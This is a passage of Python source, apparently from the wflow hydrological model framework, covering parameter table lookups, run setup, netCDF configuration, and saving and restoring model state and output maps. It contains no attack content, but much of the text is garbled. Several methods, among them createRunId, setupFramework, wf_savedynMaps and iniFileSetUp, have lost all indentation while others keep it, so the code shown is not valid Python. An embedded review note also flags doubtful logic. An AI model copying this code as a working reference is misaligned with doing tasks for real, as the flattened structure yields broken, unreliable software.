            pcr.maptotal(pcr.scalar(pcr.defined(cmask))), 0
        )
        resttotal = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(rest))), 0)
        if resttotal[0, 0] < totalzeromap[0, 0]:
            self.logger.error(
                "Not all catchment cells have a value for ["
                + pathtotbl
                + "] : "
                + str(resttotal[0, 0])
                + "!="
                + str(totalzeromap[0, 0])
            )

    # Apply multiplication table if present
    multname = os.path.dirname(pathtotbl) + ".mult"
    if os.path.exists(multname):
        multfac = pcr.lookupscalar(multname, landuse, subcatch, soil)
        rest = rest * multfac
        self.logger.info("Applying multiplication from table: " + multname)

    return rest
def readtblLayersDefault(self, pathtotbl, landuse, subcatch, soil, n, default):
    """
    First check if a prepared maps of the same name is present
    in the staticmaps directory. next try to
    read a tbl file to match a landuse, catchment and soil map. Returns
    the default value if the tbl file is not found.

    Finally check of a tbl file exists with a .mult postfix (e.g. Cmax.tbl.mult) and apply the
    multiplication to the loaded data.

    Input:
        - pathtotbl: full path to table file
        - landuse: landuse map
        - subcatch: subcatchment map
        - soil: soil map
        - n: layer number; appended to the staticmap name and used as an
          extra lookup key in the table
        - default: default value

    Output:
        - map constructed from tbl file or map with default value

    .. todo::

        Add checking for missing values
    """
    # Layer-specific prepared map: <name>_<n>.map in ../staticmaps.
    mapname = os.path.join(
        os.path.dirname(pathtotbl),
        "../staticmaps",
        os.path.splitext(os.path.basename(pathtotbl))[0] + "_" + str(n) + ".map",
    )
    if os.path.exists(mapname):
        self.logger.info("reading map parameter file: " + mapname)
        rest = pcr.cover(pcr.readmap(mapname), default)
    else:
        if os.path.isfile(pathtotbl):
            # The layer number n is supplied as a fourth (uniform) lookup key.
            rest = pcr.lookupscalar(
                pathtotbl, landuse, subcatch, soil, pcr.cover(0.0) + n
            )
            self.logger.info("Creating map from table: " + pathtotbl)
        else:
            self.logger.warning(
                "tbl file not found ("
                + pathtotbl
                + ") returning default value: "
                + str(default)
            )
            rest = pcr.spatial(pcr.cover(pcr.scalar(default)))

        # Verify that every catchment cell received a value.
        cmask = self._userModel().TopoId
        cmask = pcr.ifthen(cmask > 0, cmask)
        totalzeromap = pcr.pcr2numpy(
            pcr.maptotal(pcr.scalar(pcr.defined(cmask))), 0
        )
        resttotal = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(rest))), 0)
        if resttotal[0, 0] < totalzeromap[0, 0]:
            self.logger.warning(
                "Not all catchment cells have a value for ["
                + pathtotbl
                + "] : "
                + str(resttotal[0, 0])
                + "!="
                + str(totalzeromap[0, 0])
            )

    # Apply multiplication table if present
    multname = os.path.dirname(pathtotbl) + ".mult"
    if os.path.exists(multname):
        multfac = pcr.lookupscalar(multname, landuse, subcatch, soil)
        rest = rest * multfac
        self.logger.info("Applying multiplication from table: " + multname)

    return rest
def readtblFlexDefault(self, pathtotbl, default, *args):
    """
    First check if a prepared maps of the same name is present
    in the staticmaps directory. next try to
    read a tbl file to match a number of maps. Returns
    the default value if the tbl file is not found.

    Finally check of a tbl file exists with a .mult postfix (e.g. Cmax.tbl.mult) and apply the
    multiplication to the loaded data.

    Input:
        - pathtotbl: full path to table file
        - default: default value
        - *args: maps for the lookup table directly fed to lookupscalar

    Output:
        - map constructed from tbl file or map with default value

    .. todo::

        Add checking for missing values
    """
    mapname = (
        os.path.dirname(pathtotbl)
        + "/../staticmaps/"
        + os.path.splitext(os.path.basename(pathtotbl))[0]
        + ".map"
    )
    if os.path.exists(mapname):
        self.logger.info("Reading map parameter file: " + mapname)
        rest = pcr.cover(pcr.readmap(mapname), default)
    else:
        if os.path.isfile(pathtotbl):
            newargs = []
            args = list(args)
            # Resolve each lookup entry: entries with a file extension are
            # map paths; entries without one are treated as monthly
            # climatology stacks and read as maps here.
            for mapje in args:
                if len(os.path.splitext(mapje)[1]) > 1:  # We have an extension...
                    newargs.append(os.path.join(self._userModel().caseName, mapje))
                    # we specify a full map
                else:
                    # Assume we have monthly climatology as no extension is present
                    theparmap = self.wf_readmapClimatology(
                        os.path.join(self._userModel().caseName, mapje),
                        kind=1,
                        default=default,
                        verbose=True,
                    )
                    theparmap = pcr.cover(theparmap, default)
                    newargs.append(theparmap)
            # NOTE(review): newargs may contain pcraster map objects (the
            # climatology branch above), not only path strings, so the
            # os.path.exists test below looks suspect for those entries;
            # also ``rest`` is overwritten on every iteration, so the last
            # entry effectively decides the result — verify intent.
            for lmap in newargs:
                if not os.path.exists(lmap):
                    rest = pcr.spatial(pcr.scalar(default))
                    self.logger.debug(
                        "map file not found ("
                        + lmap
                        + ") returning default value: "
                        + str(default)
                    )
                else:
                    rest = pcr.lookupscalar(pathtotbl, *newargs)
        else:
            self.logger.debug(
                "tbl file not found ("
                + pathtotbl
                + ") returning default value: "
                + str(default)
            )
            rest = pcr.spatial(pcr.scalar(default))

    # cmask = self._userModel().TopoId
    # cmask = pcr.ifthen(cmask > 0,cmask)
    # totalzeromap = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(cmask))),0)
    # resttotal = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(rest))),0)
    # if resttotal[0,0] < totalzeromap[0,0]:
    #    self.logger.warning("Not all catchment cells have a value for [" + pathtotbl + "] : " + str(resttotal[0,0]) + "!=" + str(totalzeromap[0,0]))

    # Apply multiplication table if present
    multname = os.path.dirname(pathtotbl) + ".mult"
    if os.path.exists(multname):
        multfac = pcr.lookupscalar(multname, *args)
        rest = rest * multfac
        self.logger.info("Applying multiplication from table: " + multname)

    return rest
def createRunId(
self,
intbl="intbl",
logfname="wflow.log",
NoOverWrite=True,
model="model",
modelVersion="no version",
level=pcrut.logging.DEBUG,
doSetupFramework=True,
):
"""
Create runId dir and copy table files to it
Also changes the working dir to the case/runid directory
"""
caseName = self._userModel().caseName
runId = self._userModel().runId
if modelVersion == "no version":
modelVersion = __version__
configfile = self._userModel().configfile
if not os.path.isdir(caseName + "/" + runId):
os.makedirs(caseName + "/" + runId + "/outmaps/")
os.makedirs(caseName + "/" + runId + "/outstate/")
os.makedirs(caseName + "/" + runId + "/outsum/")
os.makedirs(caseName + "/" + runId + "/intbl/")
os.makedirs(caseName + "/" + runId + "/runinfo/")
else:
if os.path.exists(caseName + "/" + runId + "/run.tss"):
if NoOverWrite:
print(
"ERROR: refusing to overwrite an existing run: "
+ caseName
+ "/"
+ runId
+ "/run.tss"
)
sys.exit(1)
for file in glob.glob(caseName + "/" + intbl + "/*.tbl"):
shutil.copy(file, caseName + "/" + runId + "/" + intbl)
try:
shutil.copy(
caseName + "/" + configfile, caseName + "/" + runId + "/runinfo"
)
except:
print("Cannot find config file: " + caseName + "/" + configfile)
self._userModel().logger = self.loggingSetUp(
caseName, runId, logfname, model, modelVersion, level=level
)
self.logger = self._userModel().logger
self.logger.info(
"Initialise framework version: " + __version__
) # + "(" + __release__ + ")")
global logging
logging = self.logger
self._userModel().config = self.iniFileSetUp(caseName, runId, configfile)
modelnamefromobject = self._userModel().__module__
self.modelname = configget(
self._userModel().config, "model", "modeltype", "not set"
)
if self.modelname == "not set":
self.logger.warning(
"Ini file does not contain model name, assuming " + modelnamefromobject
)
self.modelname = modelnamefromobject
if modelnamefromobject != self.modelname:
self.logger.warning(
"Ini file made for "
+ self.modelname
+ " but found "
+ modelnamefromobject
+ " in code."
)
self.runlengthdetermination = configget(
self._userModel().config, "run", "runlengthdetermination", "steps"
)
self.DT.update(
timestepsecs=int(
configget(self._userModel().config, "run", "timestepsecs", "86400")
),
mode=self.runlengthdetermination,
runTimeSteps=self.DT.runTimeSteps,
)
self._update_time_from_DT()
if doSetupFramework:
self.setupFramework()
def _initAPIVars(self):
"""
Sets vars in the API that are forcing variables to the model
"""
apivars = self.wf_supplyVariableNamesAndRoles()
for var in apivars:
if not hasattr(self._userModel(), var[0]):
setattr(self._userModel(), var[0], self.TheClone)
    def setuptimeInfo(self):
        """
        Initialise the run's date/time bookkeeping (self.DT).

        Resolution order for the start/end time:

        1. If time info was already supplied via BMI (self.DT.setByBMI),
           nothing is read from the ini file.
        2. Otherwise the [run] section's ``starttime``/``endtime`` entries
           are parsed (endtime is then mandatory; missing endtime aborts).
        3. If ``starttime`` is absent, the ``runinfo`` XML file referenced in
           the [run] section is used; failing that, a default start of
           1990-01-01 is assumed.

        Also pushes ``timestepsecs`` and the current timestep into self.DT and
        mirrors the resulting datetime onto the user model (currentdatetime).
        """
        from dateutil import parser
        st = configget(self._userModel().config, "run", "starttime", "None")
        # self.skipfirsttimestep = int(configget(self._userModel().config, 'run', 'skipfirst', "0"))
        # Assume that we have set this via BMI
        if self.DT.setByBMI:
            self.logger.info(
                "Not reading time from ini file, assuming it is set by BMI or otherwise (calls = "
                + str(self.DT.callstopupdate)
                + ")"
            )
        else:
            if st == "None":  # try from the runinfo file
                rinfo_str = configget(
                    self._userModel().config, "run", "runinfo", "None"
                )
                rinfo = os.path.join(self._userModel().Dir, rinfo_str)
                # Push the timestep length first so later updates use it
                self.DT.update(
                    timestepsecs=int(
                        configget(
                            self._userModel().config, "run", "timestepsecs", "86400"
                        )
                    ),
                    mode=self.runlengthdetermination,
                    runTimeSteps=self.DT.runTimeSteps,
                )
                self._update_time_from_DT()
                if rinfo_str != "None":
                    # Take start and end time from the runinfo XML file
                    self.DT.update(
                        datetimestart=wflow_adapt.getStartTimefromRuninfo(rinfo),
                        mode=self.runlengthdetermination,
                    )
                    self.DT.update(
                        datetimeend=wflow_adapt.getEndTimefromRuninfo(rinfo),
                        mode=self.runlengthdetermination,
                    )
                    self._update_time_from_DT()
                    # add one step to start time if it is the same s the state time
                    # if self.skipfirsttimestep:
                    #     self.logger.debug("Skipping first timestep...")
                    #     self.DT.skiptime()
                    self._userModel().currentdatetime = self.DT.currentDateTime
                    self.DT.update(
                        timestepsecs=int(
                            configget(
                                self._userModel().config, "run", "timestepsecs", "86400"
                            )
                        ),
                        mode=self.runlengthdetermination,
                    )
                    self.DT.update(
                        currentTimeStep=self.DT.currentTimeStep,
                        mode=self.runlengthdetermination,
                    )
                    self._update_time_from_DT()
                else:
                    # No starttime and no runinfo file: fall back to a default
                    self.DT.update(
                        datetimestart=parser.parse("1990-01-01 00:00:00 GMT"),
                        mode=self.runlengthdetermination,
                    )
                    self.logger.info(
                        "Not enough information in the [run] section. Need start and end time or a runinfo.xml file.... Reverting to default date/time"
                    )
            else:
                # starttime given in the ini file; endtime is then required
                self.DT.update(
                    datetimestart=parser.parse(st), mode=self.runlengthdetermination
                )
                self.DT.update(
                    currentTimeStep=self.DT.currentTimeStep,
                    mode=self.runlengthdetermination,
                )
                # if self.skipfirsttimestep:
                #     self.logger.debug("Skipping first timestep...")
                #     self.DT.skiptime()
                self._userModel().currentdatetime = self.DT.currentDateTime
                ed = configget(self._userModel().config, "run", "endtime", "None")
                if ed != "None":
                    self.DT.update(
                        datetimeend=parser.parse(ed), mode=self.runlengthdetermination
                    )
                    self.DT.update(
                        timestepsecs=int(
                            configget(
                                self._userModel().config, "run", "timestepsecs", "86400"
                            )
                        ),
                        mode=self.runlengthdetermination,
                    )
                    self.DT.update(
                        currentTimeStep=self.DT.currentTimeStep,
                        mode=self.runlengthdetermination,
                    )
                else:
                    self.logger.error(
                        "No end time given with start time: [run] endtime = " + ed
                    )
                    sys.exit(1)
        self._update_time_from_DT()
def setupFramework(self):
"""
Second step, after setting the log file and reading the ini file get data from config, setup
IO etc
:return:
"""
self._initAPIVars()
self.framework_setup = True
caseName = self._userModel().caseName
runId = self._userModel().runId
self.outputFormat = int(
configget(self._userModel().config, "framework", "outputformat", "1")
)
self.APIDebug = int(
configget(
self._userModel().config, "framework", "debug", str(self.APIDebug)
)
)
self.ncfile = configget(
self._userModel().config, "framework", "netcdfinput", "None"
)
self.ncinfilestates = configget(
self._userModel().config, "framework", "netcdfstatesinput", "None"
)
self.ncoutfile = configget(
self._userModel().config, "framework", "netcdfoutput", "None"
)
self.ncoutfilestatic = configget(
self._userModel().config, "framework", "netcdfstaticoutput", "None"
)
self.ncoutfilestates = configget(
self._userModel().config, "framework", "netcdfstatesoutput", "None"
)
self.ncfilestatic = configget(
self._userModel().config, "framework", "netcdfstaticinput", "None"
)
self.EPSG = configget(
self._userModel().config, "framework", "EPSG", "EPSG:4326"
)
self.ncfileformat = configget(
self._userModel().config, "framework", "netcdf_format", "NETCDF4"
)
self.ncfilecompression = configget(
self._userModel().config, "framework", "netcdf_zlib", "True"
)
self.ncfiledigits = configget(
self._userModel().config,
"framework",
"netcdf_least_significant_digit",
"None",
)
if self.ncfiledigits == "None":
self.ncfiledigits = None
else:
self.ncfiledigits = int(self.ncfiledigits)
if self.ncfilecompression == "True":
self.ncfilecompression = True
else:
self.ncfilecompression = False
# Set the re-init hint for the local model
self.reinit = int(
configget(self._userModel().config, "run", "reinit", str(self.reinit))
)
self._userModel().reinit = self.reinit
# Now finally set the start end time. First check if set in ini otherwise check if the ini defines
# a runinfo file
self.setuptimeInfo()
# Setup all the netCDF files that may be used for input/output
if self.ncfile != "None":
varlst = []
if hasattr(self._userModel(), "parameters"):
for ms in self._userModel().parameters():
if ms.type == "timeseries":
varlst.append(os.path.basename(ms.stack))
mstacks = configsection(self._userModel().config, "inputmapstacks")
for ms in mstacks:
varlst.append(
os.path.basename(
configget(
self._userModel().config, "inputmapstacks", ms, "None"
)
)
)
self.logger.debug(
"Found following input variables to get from netcdf file: "
+ str(varlst)
)
self.NcInput = netcdfinput(
os.path.join(caseName, self.ncfile), self.logger, varlst
)
# Meta info for netcdf files
meta = {}
meta["caseName"] = caseName
meta["runId"] = runId
meta["wflow_version"] = __version__
# meta['wflow_release'] = __release__
# meta['wflow_build'] = __build__
meta["wflow_ini"] = self._userModel().configfile
if hasattr(sys, "frozen"):
meta["wflow_exe"] = "True"
else:
meta["wflow_exe"] = "False"
try:
metafrom_config = dict(self._userModel().config.items("netcdfmetadata"))
except:
metafrom_config = {}
meta.update(metafrom_config)
if self.ncinfilestates != "None":
smaps = self._userModel().stateVariables()
maps = [s + ".map" for s in smaps]
self.logger.debug(
"Found following input states to get from netcdf file: " + str(maps)
)
self.NcInputStates = netcdfinputstates(
os.path.join(caseName, self.ncinfilestates), self.logger, maps
)
if self.ncfilestatic != "None":
self.NcInputStatic = netcdfinputstatic(
os.path.join(caseName, self.ncfilestatic), self.logger
)
if self.ncoutfile != "None": # Ncoutput
buffer = int(
configget(
self._userModel().config, "framework", "netcdfwritebuffer", "50"
)
)
self.NcOutput = netcdfoutput(
os.path.join(caseName, runId, self.ncoutfile),
self.logger,
self.DT.outPutStartTime,
self.DT.runTimeSteps,
maxbuf=buffer,
metadata=meta,
EPSG=self.EPSG,
timestepsecs=self.DT.timeStepSecs,
Format=self.ncfileformat,
zlib=self.ncfilecompression,
least_significant_digit=self.ncfiledigits,
)
if self.ncoutfilestatic != "None": # Ncoutput
self.NcOutputStatic = netcdfoutputstatic(
os.path.join(caseName, runId, self.ncoutfilestatic),
self.logger,
self.DT.runEndTime,
1,
timestepsecs=self.DT.timeStepSecs,
maxbuf=1,
metadata=meta,
EPSG=self.EPSG,
Format=self.ncfileformat,
zlib=self.ncfilecompression,
least_significant_digit=self.ncfiledigits,
)
if self.ncoutfilestates != "None": # Ncoutput
self.NcOutputState = netcdfoutputstatic(
os.path.join(caseName, runId, self.ncoutfilestates),
self.logger,
self.DT.runEndTime,
1,
timestepsecs=self.DT.timeStepSecs,
maxbuf=1,
metadata=meta,
EPSG=self.EPSG,
Format=self.ncfileformat,
zlib=self.ncfilecompression,
least_significant_digit=self.ncfiledigits,
)
# Add the on-line statistics
self.onlinestat = wf_online_stats()
rollingvars = configsection(self._userModel().config, "rollingmean")
for thisvar in rollingvars:
try:
thisvarnoself = thisvar.split("self.")[1]
except:
logging.error("Entry in ini invalid: " + thisvar)
raise ValueError
pts = int(self._userModel().config.get("rollingmean", thisvar))
self.onlinestat.addstat(thisvarnoself, points=pts)
# and set the var names
for key in self.onlinestat.statvarname:
setattr(
self._userModel(), self.onlinestat.statvarname[key], self.TheClone * 0.0
)
# Fill the summary (stat) list from the ini file
self.statslst = []
_type = wf_sumavg(None)
for sttype in _type.availtypes:
_maps = configsection(self._userModel().config, "summary_" + sttype)
for thismap in _maps:
thismapname = os.path.join(
caseName,
runId,
"outsum",
self._userModel().config.get("summary_" + sttype, thismap),
)
try:
thismap = thismap.split("self.")[1]
except:
logging.error("Entry in ini invalid: " + thismap)
raise ValueError
self.statslst.append(
wf_sumavg(thismap, mode=sttype, filename=thismapname)
)
# Get model parameters from model object
if hasattr(self._userModel(), "parameters"):
self.modelparameters = self._userModel().parameters()
else:
self.modelparameters = []
# Read extra model parameters from ini file
modpars = configsection(self._userModel().config, "modelparameters")
for par in modpars:
aline = self._userModel().config.get("modelparameters", par)
vals = aline.split(",")
if len(vals) >= 4:
# check if par already present
present = par in [xxx[0] for xxx in self.modelparameters]
if present:
pos = [xxx[0] for xxx in self.modelparameters].index(par)
# Check if the existing definition is static, in that case append, otherwise overwrite
if "static" in self.modelparameters[pos].type:
self._userModel().logger.debug(
"Creating extra parameter specification for par: "
+ par
+ " ("
+ str(vals)
+ ")"
)
self.modelparameters.append(
self.ParamType(
name=par,
stack=vals[0],
type=vals[1],
default=float(vals[2]),
),
verbose=vals[3],
lookupmaps=vals[4:],
)
else:
self._userModel().logger.debug(
"Updating existing parameter specification for par: "
+ par
+ " ("
+ str(vals)
+ ")"
)
self.modelparameters[pos] = self.ParamType(
name=par,
stack=vals[0],
type=vals[1],
default=float(vals[2]),
verbose=vals[3],
lookupmaps=vals[4:],
)
else:
self._userModel().logger.debug(
"Creating parameter specification for par: "
+ par
+ " ("
+ str(vals)
+ ")"
)
self.modelparameters.append(
self.ParamType(
name=par,
stack=vals[0],
type=vals[1],
default=float(vals[2]),
verbose=vals[3],
lookupmaps=vals[4:],
)
)
else:
logging.error("Parameter line in ini not valid: " + aline)
raise ValueError
varchanges = configsection(self._userModel().config, "variable_change_once")
for chvar in varchanges:
a = chvar.replace("self", "self._userModel()")
self.modelparameters_changes_once[a] = (
self._userModel()
.config.get("variable_change_once", chvar)
.replace("self", "self._userModel()")
)
varchanges = configsection(self._userModel().config, "variable_change_timestep")
for chvar in varchanges:
a = chvar.replace("self", "self._userModel()")
self.modelparameters_changes_timestep[a] = (
self._userModel()
.config.get("variable_change_timestep", chvar)
.replace("self", "self._userModel()")
)
# Now gather all the csv/tss/txt etc timeseries output objects
# Print .ini defined outputmaps per timestep
checktss = configsection(self._userModel().config, "outputtss")
if len(checktss) > 0:
self.logger.warning(
"Found a outputtss section. This is NOT used anymore in this version. Please use outputtss_0 .. n"
)
self.oscv = {}
self.samplenamecsv = {}
self.varnamecsv = {}
for tsformat in ["csv", "tss"]:
secnr = 0
toprint = [None]
while len(toprint) > 0:
thissection = "output" + tsformat + "_" + str(secnr)
toprint = configsection(self._userModel().config, thissection)
secnr = secnr + 1
samplemapname = os.path.join(
caseName,
configget(
self._userModel().config, thissection, "samplemap", "None"
),
)
areafunction = configget(
self._userModel().config, thissection, "function", "average"
)
timeformat = configget(
self._userModel().config, thissection, "timeformat", "steps"
)
if "None" not in samplemapname:
try:
self.samplemap = self.wf_readmap(samplemapname, 0.0, fail=True)
idd = tsformat + ":" + samplemapname + ":" + areafunction
self.oscv[idd] = wf_OutputTimeSeriesArea(
self.samplemap,
oformat=tsformat,
areafunction=areafunction,
tformat=timeformat,
)
self.logger.info(
"Adding "
+ tsformat
+ " output at "
+ samplemapname
+ " function: "
+ areafunction
)
except:
self.logger.warning(
"Could not read sample id-map for timeseries: "
+ samplemapname
)
self.logger.warning(sys.exc_info())
for a in toprint:
if (
"samplemap" not in a
and "function" not in a
and "timeformat" not in a
):
b = a.replace("self", "self._userModel()")
fn = os.path.join(
caseName,
runId,
self._userModel().config.get(thissection, a),
)
self.samplenamecsv[fn] = idd
self.varnamecsv[fn] = b
    def wf_suspend(self, directory):
        """
        Suspend the state variables to disk as .map files.

        List-valued state variables are written as a stack of files with a
        ``_0 .. _n`` postfix; scalar (map) state variables as a single
        ``<var>.map``. Also saves the summary maps via wf_savesummarymaps().

        :param directory: directory to write the state .map files to
        """
        self._incrementIndentLevel()
        self._traceIn("suspend")
        allvars = self._userModel().stateVariables()
        for var in allvars:
            try:
                fname = os.path.join(directory, var).replace("\\", "/") + ".map"
                # savevar = getattr(self._userModel(), var)
                # reduce over the dotted name supports nested attributes ("a.b")
                savevar = reduce(getattr, var.split("."), self._userModel())
                try:  # Check if we have a list of maps
                    # len() raises for a single pcraster map, which routes
                    # single maps to the except branch below
                    b = len(savevar)
                    a = 0
                    for z in savevar:
                        fname = (
                            os.path.join(directory, var + "_" + str(a)).replace(
                                "\\", "/"
                            )
                            + ".map"
                        )
                        self.reportState(
                            pcr.cover(z), fname, style=1, gzipit=False, longname=fname
                        )
                        a = a + 1
                except:
                    # thevar = getattr(self._userModel(), var)
                    # single map: write it as <var>.map
                    thevar = reduce(getattr, var.split("."), self._userModel())
                    self.reportState(
                        thevar, fname, style=1, gzipit=False, longname=fname
                    )
            except:
                self.logger.warning("Problem saving state variable: " + var)
                # self.logger.warning(execstr)
                self.logger.warning(sys.exc_info())
        # Save the summary maps
        self.wf_savesummarymaps()
        self._traceOut("suspend")
        self._decrementIndentLevel()
    def wf_saveTimeSeries(self):
        """
        Write the .ini defined csv/tss timeseries output for the current step.

        For each registered output file the configured model variable is
        resolved (supporting "+"-separated sums, dotted nested attributes and
        ``var[n]`` list elements) and passed to the matching
        wf_OutputTimeSeriesArea writer. Exits the run when a configured
        variable does not exist on the model.
        """
        for a in self.samplenamecsv:
            found = 1
            try:
                if "+" in self.varnamecsv[a]:
                    # sum of multiple model variables
                    a_ = self.varnamecsv[a].split("+")
                    tmpvar = pcr.cover(0.0)
                    for i in np.arange(0, len(a_)):
                        tmpvar = tmpvar + reduce(
                            getattr,
                            a_[i].strip().replace("self._userModel().", "").split("."),
                            self._userModel(),
                        )
                else:
                    # this is added for flextopo -- because list of variables for different classes
                    if '[' in self.varnamecsv[a].replace("self._userModel().", ""):
                        # "var[n]" style: index into a list attribute
                        listnr = self.varnamecsv[a].replace("self._userModel().", "").split('[')[-1].split(']')[0]
                        varname = self.varnamecsv[a].replace("self._userModel().", "").split('[')[0]
                        tmpvar = getattr(self._userModel(),varname)[int(listnr)]
                    else:
                        # plain (possibly dotted) attribute lookup
                        tmpvar = reduce(
                            getattr,
                            self.varnamecsv[a].replace("self._userModel().", "").split("."),
                            self._userModel(),
                        )
            except:
                found = 0
                self.logger.fatal(
                    "Cannot find: " + self.varnamecsv[a] + " variable not in model."
                )
                sys.exit(1)
            self.oscv[self.samplenamecsv[a]].writestep(
                tmpvar,
                a,
                timestep=self.DT.currentTimeStep - 1,
                dtobj=self.DT.currentDateTime,
            )
    def wf_savesummarymaps(self):
        """
        Saves the maps defined in the summary section to disk
        [summary] # Single values or end values
        [summary_sum] # accumulative maps over the model run
        [summary_avg] # average of maps over the model run
        [summary_max] # max of maps over the model run
        [summary_min] # min of maps over the model run

        All maps are written to the run's outsum directory. Also writes the
        model's own default_summarymaps() (if defined) and finalises the
        running statistics collected in self.statslst.
        """
        self._userModel().logger.info("Saving summary maps to disk...")
        toprint = configsection(self._userModel().config, "summary")
        for a in toprint:
            b = a.replace("self.", "")
            try:
                #below if statement for topoflex lists code
                if '[' in str(b):
                    # "var[n]" style: index into a list attribute
                    listnr = str(b).split('[')[-1].split(']')[0]
                    varname = str(b).split('[')[0]
                    pcrmap = getattr(self._userModel(),varname)[int(listnr)]
                else:
                    pcrmap = getattr(self._userModel(), b)
                self.reportStatic(
                    pcrmap,
                    os.path.join(
                        self._userModel().Dir,
                        self._userModel().runId,
                        "outsum",
                        self._userModel().config.get("summary", a),
                    ),
                    style=1,
                )
            except:
                self._userModel().logger.warning(
                    "Could not find or save the configured summary map:" + a
                )
        # Check of the usermodel has a list of summary maps defined and save those
        if hasattr(self._userModel(), "default_summarymaps"):
            for a in self._userModel().default_summarymaps():
                b = a.replace("self.", "")
                if hasattr(self._userModel(), b):
                    pcrmap = getattr(self._userModel(), b)
                    # pcr.report( pcrmap , os.path.join(self._userModel().Dir, self._userModel().runId, "outsum", b + ".map" ))
                    self.reportStatic(
                        pcrmap,
                        os.path.join(
                            self._userModel().Dir,
                            self._userModel().runId,
                            "outsum",
                            b + ".map",
                        ),
                        style=1,
                    )
        # These are the ones in the _sum _average etc sections
        for a in range(0, len(self.statslst)):
            self.statslst[a].finalise()
            # only spatial results can be written as a map
            if hasattr(self.statslst[a].result, "isSpatial"):
                data = self.statslst[a].result
                fname = self.statslst[a].filename
                if hasattr(data, "isSpatial"):
                    # report (data,fname)
                    self.reportStatic(data, fname, style=1)
def wf_savedynMaps(self):
"""
Save the maps defined in the ini file for the dynamic section
.. todo::
Save maps to be used in memory at startup and do not call the ini file each time
"""
# Print .ini defined outputmaps per timestep
toprint = configsection(self._userModel().config, "outputmaps")
self.logger.info("saving maps")
for a in toprint:
report = False
# possible to add variables
if "+" in a:
a_ = a.split("+")
thevar = pcr.cover(0.0)
for i in np.arange(0, len(a_)):
# check for nested objects
if len(a_[i].replace("self.", "").split(".")) > 1:
if hasattr(
(
self._userModel(),
a_[i].replace("self.", "").split(".")[0],
)
and reduce(
getattr,
a_[i].replace("self.", "").split("."),
self._userModel(),
)
is not None
):
thevar = thevar + reduce(
getattr,
a_[i].replace("self.", "").split("."),
self._userModel(),
)
report = True
elif hasattr(self._userModel(), a_[i].strip().replace("self.", "")):
thevar = thevar + getattr(
self._userModel(), a_[i].strip().replace("self.", "")
)
report = True
else:
report = False
break
else:
# check for nested objects
if len(a.replace("self.", "").split(".")) > 1:
if (
hasattr(self._userModel(), a.replace("self.", "").split(".")[0])
and reduce(
getattr,
a.replace("self.", "").split("."),
self._userModel(),
)
is not None
):
thevar = reduce(
getattr,
a.replace("self.", "").split("."),
self._userModel(),
)
report = True
#add lines below for topoflex
elif '[' in str(a.replace("self.", "")):
listnr = str(a.replace("self.", "")).split('[')[-1].split(']')[0]
varname = str(a.replace("self.", "")).split('[')[0]
thevar = getattr(self._userModel(),varname)[int(listnr)]
report = True
elif hasattr(self._userModel(), a.replace("self.", "")):
thevar = getattr(self._userModel(), a.replace("self.", ""))
report = True
if report == True:
if type(thevar) is list:
a = self._userModel().config.get("outputmaps", a)
for i in np.arange(0, len(thevar)):
thename = a + "_" + str(i) + "_"
self._reportNew(
thevar[i],
os.path.join(
self._userModel().Dir,
self._userModel().runId,
"outmaps",
thename,
),
longname=thename,
)
else:
self._reportNew(
thevar,
os.path.join(
self._userModel().Dir,
self._userModel().runId,
"outmaps",
self._userModel().config.get("outputmaps", a),
),
longname=a,
)
else:
self.logger.warning("outputmap " + a + " not found in usermodel")
    def wf_resume(self, directory):
        """
        Resumes the state variables from disk as .map files (or arrays of maps
        files using a _? postfix).

        For each state variable the stacked form ``<var>_0.map .. <var>_n.map``
        is tried first (restored as a python list); if no stack exists a single
        ``<var>.map`` is read. A read failure for the single-map form aborts
        the run with a hint to use -I (cold start).

        :param directory: directory holding the state .map files
        """
        self._incrementIndentLevel()
        self._traceIn("resume")
        allvars = self._userModel().stateVariables()
        for var in allvars:
            # First try to read a stack of state files
            stop = 0
            nr = 0
            while stop == 0:
                name = os.path.join(directory, var + "_" + str(nr) + ".map").replace(
                    "\\", "/"
                )
                if os.path.exists(name):
                    tvar = self.wf_readmap(
                        name,
                        0.0,
                        ncfilesource=self.ncinfilestates,
                        fail=True,
                        silent=True,
                    )
                    if nr == 0:
                        # first element found: start a fresh list on the model
                        setattr(self._userModel(), var, [])
                    getattr(self._userModel(), var).append(tvar)
                    nr = nr + 1
                else:
                    if nr > 0:
                        self.logger.info(
                            "state variable "
                            + str(var)
                            + " contains "
                            + str(nr)
                            + " state files (stack)"
                        )
                    stop = 1
            # nr == 0 means no stack was found: read a single map instead
            if nr == 0:
                try:
                    mpath = os.path.join(directory, var + ".map").replace("\\", "/")
                    tvar = self.wf_readmap(mpath, 0.0, ncfilesource=self.ncinfilestates)
                    # check for nested objects
                    if "." in var:
                        attrs = var.split(".")
                        c = getattr(self._userModel(), attrs[0])
                        setattr(c, attrs[1], tvar)
                    else:
                        setattr(self._userModel(), var, tvar)
                except:
                    self.logger.error(
                        "problem while reading state variable from disk: "
                        + mpath
                        + " Suggest to use the -I option to restart"
                    )
                    sys.exit(1)
        self._traceOut("resume")
        self._decrementIndentLevel()
def wf_QuickSuspend(self):
"""
Save the state variable of the current timestep in memory
it uses the wf_supplyVariableNamesAndRoles() function to find them.
The variables are inserted into the model object
This function is normally called as part of the run. Normally there is
no need to call it directly.
"""
allvars = self._userModel().stateVariables()
for var in allvars:
try:
setattr(
self._userModel(),
var + "_laststep",
reduce(getattr, var.split("."), self._userModel()),
)
except:
self.logger.warning("Problem saving state variable: " + var)
def wf_QuickResume(self):
"""
Resumes the state variable of the previous timestep in memory
it uses the wf_supplyVariableNamesAndRoles() function to find them.
The variables are inserted into the model object
"""
allvars = self._userModel().stateVariables()
for var in allvars:
setattr(
self._userModel(), var, getattr(self._userModel(), var + "_laststep")
)
ts = self._userModel().currentTimeStep()
self._userModel()._setCurrentTimeStep(ts)
self.DT.update(currentTimeStep=ts)
self._userModel().currentdatetime = self.DT.currentDateTime
self.logger.debug(
"Going one timestep back, redoing: "
+ str(ts)
+ " "
+ str(self.DT.currentDateTime)
)
def iniFileSetUp(self, caseName, runId, configfile):
"""
Reads .ini file and returns a config object.
Input:
- caseName - dir with case
- runId - run dir within case
- configfile - name of the configfile (.ini type)
Output:
- python config object
"""
config = configparser.ConfigParser()
config.optionxform = str
if os.path.exists(os.path.join(caseName, configfile)):
config.read(os.path.join(caseName, configfile))
else:
self.logger.error(
